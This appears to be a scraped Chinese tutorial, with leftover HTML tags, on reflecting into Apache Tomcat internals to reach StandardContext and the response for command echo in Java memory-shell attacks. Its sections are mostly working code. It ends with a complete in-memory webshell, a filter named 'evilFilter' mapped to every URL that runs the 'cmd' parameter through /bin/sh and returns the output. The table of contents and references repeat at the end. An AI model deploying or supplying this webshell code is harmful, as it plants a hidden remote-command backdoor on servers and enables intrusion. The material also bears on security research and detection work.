Tomcat环境下获取StandardContext及Response回显方法详解<\/h1>

1. Tomcat中三个Context的理解<\/h2>

1.1 ServletContext<\/h3>
Servlet规范中规定的接口<\/li>
规定了WEB容器Context的基本功能：
获取路径<\/li>
获取参数<\/li>
获取当前filter<\/li>
获取当前servlet等<\/li> <\/ul> <\/li> <\/ul>
1.2 ApplicationContext<\/h3>
Tomcat中对ServletContext接口的实现<\/li>
使用了门面模式，实际套了一层ApplicationContextFacade<\/li>
实现了ServletContext规范定义的方法：
addServlet<\/li>
addFilter等<\/li> <\/ul> <\/li> <\/ul>
1.3 StandardContext<\/h3>
Tomcat中真正起作用的Context<\/li>
负责与Tomcat底层交互<\/li>
ApplicationContext更像是对StandardContext的封装<\/li> <\/ul>
2. JSP环境下获取StandardContext的方法<\/h2>

方法1：通过RequestFacade获取<\/h3>
\/\/ 获取ApplicationContextFacade
<\/span><\/span><\/span><\/span>ApplicationContextFacade applicationContextFacade =<\/span> (<\/span>ApplicationContextFacade)<\/span> request.<\/span>getSession<\/span>().<\/span>getServletContext<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射获取StandardContext
<\/span><\/span><\/span><\/span>Field field =<\/span> applicationContextFacade.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>ApplicationContext applicationContext =<\/span> (<\/span>ApplicationContext)<\/span> field.<\/span>get<\/span>(<\/span>applicationContextFacade);<\/span>
<\/span><\/span>
<\/span><\/span>field =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span> field.<\/span>get<\/span>(<\/span>applicationContext);<\/span>
<\/span><\/span><\/code><\/pre>方法2：通过Request的mappingData获取<\/h3>
\/\/ 获取Request对象
<\/span><\/span><\/span><\/span>Field field =<\/span> request.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Request req =<\/span> (<\/span>Request)<\/span> field.<\/span>get<\/span>(<\/span>request);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 从mappingData中获取StandardContext
<\/span><\/span><\/span><\/span>StandardContext standardContext =<\/span> req.<\/span>getMappingData<\/span>().<\/span>context<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>3. Java原生环境下获取StandardContext的方法<\/h2>
方法1：通过WebappClassLoaderBase获取<\/h3>
\/\/ 获取当前线程的上下文类加载器
<\/span><\/span><\/span><\/span>WebappClassLoaderBase webappClassLoaderBase =<\/span> (<\/span>WebappClassLoaderBase)<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取StandardContext
<\/span><\/span><\/span><\/span>StandardContext standardContext =<\/span> webappClassLoaderBase.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p>

仅适用于Tomcat 8\/9<\/li>
在8.5.78+版本中getResources()被标记为@Deprecated<\/li>
在10.x版本中该方法被移除<\/li>
<\/ul>
方法2：通过ThreadLocal获取（kingkk方法）<\/h3>
\/\/ 1. 反射修改ApplicationDispatcher.WRAP_SAME_OBJECT为true
<\/span><\/span><\/span><\/span>Class<?><\/span> applicationDispatcher =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.catalina.core.ApplicationDispatcher"<\/span>);<\/span>
<\/span><\/span>Field wrapSameObjectField =<\/span> applicationDispatcher.<\/span>getDeclaredField<\/span>(<\/span>"WRAP_SAME_OBJECT"<\/span>);<\/span>
<\/span><\/span>wrapSameObjectField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>boolean<\/span> originWrapSameObjectValue =<\/span> wrapSameObjectField.<\/span>getBoolean<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>wrapSameObjectField.<\/span>setBoolean<\/span>(<\/span>null<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 初始化lastServicedRequest和lastServicedResponse
<\/span><\/span><\/span><\/span>Class<?><\/span> applicationFilterChain =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.apache.catalina.core.ApplicationFilterChain"<\/span>);<\/span>
<\/span><\/span>Field lastServicedRequestField =<\/span> applicationFilterChain.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedRequest"<\/span>);<\/span>
<\/span><\/span>lastServicedRequestField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>ThreadLocal<?><\/span> threadLocalReq =<\/span> (<\/span>ThreadLocal<?>)<\/span> lastServicedRequestField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Field lastServicedResponseField =<\/span> applicationFilterChain.<\/span>getDeclaredField<\/span>(<\/span>"lastServicedResponse"<\/span>);<\/span>
<\/span><\/span>lastServicedResponseField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>ThreadLocal<?><\/span> threadLocalRes =<\/span> (<\/span>ThreadLocal<?>)<\/span> lastServicedResponseField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 获取RequestFacade
<\/span><\/span><\/span><\/span>RequestFacade requestFacade =<\/span> (<\/span>RequestFacade)<\/span> threadLocalReq.<\/span>get<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>限制<\/strong>：<\/p>

只适用于Tomcat <10, JDK <17<\/li>
在Shiro环境下无法使用<\/li>
需要访问两次指定servlet才能成功<\/li>
<\/ul>
4. Tomcat直接写Response的方法<\/h2>
方法1：半通用方法（通过已有Request\/Response）<\/h3>
\/\/ 获取Response对象后直接写入
<\/span><\/span><\/span><\/span>response.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>"Hello World"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>方法2：Tomcat 8\/9\/10通用方法（Litch1方法）<\/h3>
\/\/ 1. 获取StandardService
<\/span><\/span><\/span><\/span>StandardContext standardContext =<\/span> ...;<\/span> \/\/ 通过前述方法获取
<\/span><\/span><\/span><\/span>StandardService standardService =<\/span> (<\/span>StandardService)<\/span> standardContext.<\/span>getParent<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 获取Connector和Http11NioProtocol
<\/span><\/span><\/span><\/span>Connector[]<\/span> connectors =<\/span> standardService.<\/span>findConnectors<\/span>();<\/span>
<\/span><\/span>Http11NioProtocol protocol =<\/span> (<\/span>Http11NioProtocol)<\/span> connectors[<\/span>0<\/span>].<\/span>getProtocolHandler<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 获取ConnectionHandler
<\/span><\/span><\/span><\/span>ConnectionHandler handler =<\/span> protocol.<\/span>getHandler<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 获取GlobalRequestProcessor和RequestInfo
<\/span><\/span><\/span><\/span>Field globalField =<\/span> handler.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"global"<\/span>);<\/span>
<\/span><\/span>globalField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>RequestGroupInfo global =<\/span> (<\/span>RequestGroupInfo)<\/span> globalField.<\/span>get<\/span>(<\/span>handler);<\/span>
<\/span><\/span>
<\/span><\/span>RequestInfo[]<\/span> processors =<\/span> global.<\/span>getProcessors<\/span>();<\/span>
<\/span><\/span>for<\/span> (<\/span>RequestInfo processor :<\/span> processors)<\/span> {<\/span>
<\/span><\/span>    \/\/ 5. 获取Request对象
<\/span><\/span><\/span><\/span>    Field reqField =<\/span> processor.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"req"<\/span>);<\/span>
<\/span><\/span>    reqField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Request req =<\/span> (<\/span>Request)<\/span> reqField.<\/span>get<\/span>(<\/span>processor);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 6. 获取Response并写入
<\/span><\/span><\/span><\/span>    Response res =<\/span> req.<\/span>getResponse<\/span>();<\/span>
<\/span><\/span>    res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>"Hello World"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>方法3：Tomcat 7\/8\/9通用方法（李三方法）<\/h3>
\/\/ 1. 获取Registry
<\/span><\/span><\/span><\/span>Registry registry =<\/span> Registry.<\/span>getRegistry<\/span>(<\/span>null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 查找RequestProcessor
<\/span><\/span><\/span><\/span>Object[]<\/span> processors =<\/span> (<\/span>Object[])<\/span> registry.<\/span>find<\/span>(<\/span>new<\/span> ObjectName(<\/span>"Tomcat:type=GlobalRequestProcessor,*"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> (<\/span>Object processor :<\/span> processors)<\/span> {<\/span>
<\/span><\/span>    \/\/ 3. 获取RequestInfo
<\/span><\/span><\/span><\/span>    Field requestInfoField =<\/span> processor.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"requestInfo"<\/span>);<\/span>
<\/span><\/span>    requestInfoField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    RequestInfo requestInfo =<\/span> (<\/span>RequestInfo)<\/span> requestInfoField.<\/span>get<\/span>(<\/span>processor);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 4. 获取Request对象
<\/span><\/span><\/span><\/span>    Field reqField =<\/span> requestInfo.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"req"<\/span>);<\/span>
<\/span><\/span>    reqField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Request req =<\/span> (<\/span>Request)<\/span> reqField.<\/span>get<\/span>(<\/span>requestInfo);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 5. 获取Response并写入
<\/span><\/span><\/span><\/span>    Response res =<\/span> req.<\/span>getResponse<\/span>();<\/span>
<\/span><\/span>    res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>"Hello World"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 方法对比总结<\/h2>



攻击方式<\/th>
适用版本<\/th>
Shiro兼容性<\/th>
<\/tr>
<\/thead>


取lastServicedRequest<\/td>
Tomcat 7\/8\/9<\/td>
不兼容<\/td>
<\/tr>

从ConnectionHandler取global<\/td>
Tomcat 8\/9\/10<\/td>
兼容<\/td>
<\/tr>

直接从Registry读取<\/td>
Tomcat 7\/8\/9<\/td>
兼容<\/td>
<\/tr>
<\/tbody>
<\/table>
6. 实际应用示例<\/h2>
6.1 通过ThreadLocal获取Request并写入内存马<\/h3>
\/\/ 1. 获取RequestFacade（使用前述方法2）
<\/span><\/span><\/span><\/span>RequestFacade requestFacade =<\/span> ...;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 获取StandardContext
<\/span><\/span><\/span><\/span>Field field =<\/span> requestFacade.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Request request =<\/span> (<\/span>Request)<\/span> field.<\/span>get<\/span>(<\/span>requestFacade);<\/span>
<\/span><\/span>StandardContext standardContext =<\/span> request.<\/span>getContext<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 创建恶意Filter
<\/span><\/span><\/span><\/span>Filter filter =<\/span> new<\/span> Filter()<\/span> {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> {}<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        HttpServletRequest req =<\/span> (<\/span>HttpServletRequest)<\/span> servletRequest;<\/span>
<\/span><\/span>        if<\/span> (<\/span>req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            String[]<\/span> cmd =<\/span> {<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)};<\/span>
<\/span><\/span>            InputStream in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd).<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>            Scanner s =<\/span> new<\/span> Scanner(<\/span>in).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>);<\/span>
<\/span><\/span>            String output =<\/span> s.<\/span>hasNext<\/span>()<\/span> ?<\/span> s.<\/span>next<\/span>()<\/span> :<\/span> ""<\/span>;<\/span>
<\/span><\/span>            servletResponse.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>output);<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span> servletResponse);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> destroy<\/span>()<\/span> {}<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 创建FilterDef和FilterMap
<\/span><\/span><\/span><\/span>FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span>
<\/span><\/span>filterDef.<\/span>setFilter<\/span>(<\/span>filter);<\/span>
<\/span><\/span>filterDef.<\/span>setFilterName<\/span>(<\/span>"evilFilter"<\/span>);<\/span>
<\/span><\/span>filterDef.<\/span>setFilterClass<\/span>(<\/span>filter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span>
<\/span><\/span>standardContext.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span>
<\/span><\/span>
<\/span><\/span>FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span>
<\/span><\/span>filterMap.<\/span>setFilterName<\/span>(<\/span>"evilFilter"<\/span>);<\/span>
<\/span><\/span>filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span>
<\/span><\/span>standardContext.<\/span>addFilterMapBefore<\/span>(<\/span>filterMap);<\/span>
<\/span><\/span><\/code><\/pre>7. 注意事项<\/h2>

版本兼容性<\/strong>：不同Tomcat版本实现细节可能不同，需要针对性调整<\/li>
JDK限制<\/strong>：JDK 17+限制了final字段的反射修改<\/li>
Shiro环境<\/strong>：部分方法在Shiro环境下不可用<\/li>
线程安全<\/strong>：多线程环境下需要考虑线程安全问题<\/li>
防御措施<\/strong>：现代WAF\/RASP可能检测此类操作<\/li>
<\/ol>
8. 参考资源<\/h2>

Landgrey's Blog - Java内存马<\/a><\/li>
CMISL - JAVA内存马<\/a><\/li>
ScriptBoy - Tomcat Filter注入<\/a><\/li>
HalfBlue - Java反序列化回显<\/a><\/li>
<\/ol>
Tomcat环境下获取StandardContext及Response回显方法详解<\/h1>

1. Tomcat中三个Context的理解<\/h2>

2. JSP环境下获取StandardContext的方法<\/h2>

3. Java原生环境下获取StandardContext的方法<\/h2>

4. Tomcat直接写Response的方法<\/h2>

6. 实际应用示例<\/h2>

8. 参考资源<\/h2> Landgrey's Blog - Java内存马<\/a><\/li> CMISL - JAVA内存马<\/a><\/li> ScriptBoy - Tomcat Filter注入<\/a><\/li> HalfBlue - Java反序列化回显<\/a><\/li> <\/ol>

8. 参考资源<\/h2>

Landgrey's Blog - Java内存马<\/a><\/li>
CMISL - JAVA内存马<\/a><\/li>
ScriptBoy - Tomcat Filter注入<\/a><\/li>
HalfBlue - Java反序列化回显<\/a><\/li> <\/ol>
